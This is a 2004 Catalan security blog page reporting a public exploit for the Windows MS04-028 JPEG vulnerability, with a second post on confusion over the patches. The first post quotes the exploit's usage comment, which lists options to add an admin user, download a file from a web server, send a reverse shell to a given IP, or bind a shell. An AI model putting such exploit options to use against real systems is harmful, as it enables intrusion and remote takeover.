Arxiu

diumenge, 3 / octubre / 2004

Nou exploit de la vulnerabilitat MS04-028 JpegOfDeath.c, exploit utilitzatble de forma remota per a la vulnerabilitat MS04-028: /* * Exploit Name: * ============= * JpegOfDeath.M.c v0.6.a All in one Bind/Reverse * /Admin/FileDownload * ============= * Tweaked Exploit By M4Z3R For GSO * All Credits & Greetings Go To: * ========== * (...) * =========== * Flags Usage: * -a: Add User X with Pass X to Admin Group; * IE: Exploit.exe -a pic.jpg * -d: Download a File From an HTTP Server; * IE: Exploit.exe -d http://YourWebServer/ * Patch.exe pic.jpg * -r: Send Back a Shell To a Specified IP on a * Specific Port; * IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg * (Default Port is 1337) * -b: Bind a Shell on The Exploited Machine On a * Specific Port; * IE: Exploit.exe -b -p 132 pic.jpg (Default Port * is 1337) */ Ara la pregunta es saber quan això començarà a ser utilitzat de forma massiva per virus i cucs.

15:46 (# Enllaç permanent) | |

Confusió amb els pegats de Windows Fa unes tres setmanes ja vaig indicar l'existència de problemes amb el Windows Update (que només afectaven a la versió en català i que ja han estat solucionats per Microsoft). Ara Jon Udell també comenta els problemes originats per la última vulnerabilitat crítica de Windows (MS04-028) i la confusió alhora d'aplicar els pegats.
15:42 (# Enllaç permanent) | |

	Octubre 2004 Diu Dil Dim Dim Dij Div Dis           1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31             Set   Nov Home

	Webs d'amics jcea Vicent Partal Jordi Mas Toni Hermoso Mercè Molist Mina Nabona-Jassans Gurus Scripting News Jon Udell Bruce Sterling Bruce Schneier Howard Rheingold Reflexiones e irreflexiones Atalaya Cuaderno de bitácora Linotipo Pedro Jorge Romero Seguretat reversing.org Seguridad de la información Somiatruites, Ciberderechos      en la red eN Espiral ~> Juanma Merino Navega seguro PDA CosesPalm PalmCat CanalPDA.com Cultura El Llibreter